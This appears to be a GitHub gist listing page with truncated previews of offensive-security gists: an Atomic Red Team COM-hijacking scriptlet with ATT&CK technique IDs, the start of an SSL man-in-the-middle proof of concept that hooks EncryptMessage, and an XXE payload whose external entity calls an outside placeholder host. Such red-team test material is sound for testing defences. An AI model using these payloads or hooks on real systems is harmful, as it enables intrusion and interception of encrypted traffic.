yu-yang
yu-yang
/ AtomicRedTeam.sct
Created
September 29, 2017 23:23
Sample COM Hijacking Atomic Red Team Test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="AtomicRedTeam" | |
| progid="AtomicRedTeam" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| T1103 - AppInitDlls | |
| T1017 - Application Deployment Software | |
| T1131 - Authentication Package | |
| T1009 - Binary Padding | |
| T1042 - Change Default Association | |
| T1116 - Code Signing | |
| T1122 - Component Object Model Hijacking | |
| T1003 - Credential Access | |
| T1055 - DLL Injection | |
| T1038 - DLL Search Order Hijacking |
yu-yang
/ memMITM.cpp
Created
December 19, 2017 00:46
— forked from anonymous/memMITM.cpp
SSL MITM PoC - Hook sspicli!EncryptMessage
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define SECURITY_WIN32 //Define First Before Imports. | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies | |
| FARPROC fpEncryptMessage; //Pointer To The Original Location | |
| BYTE bSavedByte; //Saved Byte Overwritten by 0xCC - |
yu-yang
/ XXE_payloads
Created
March 29, 2018 21:59
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |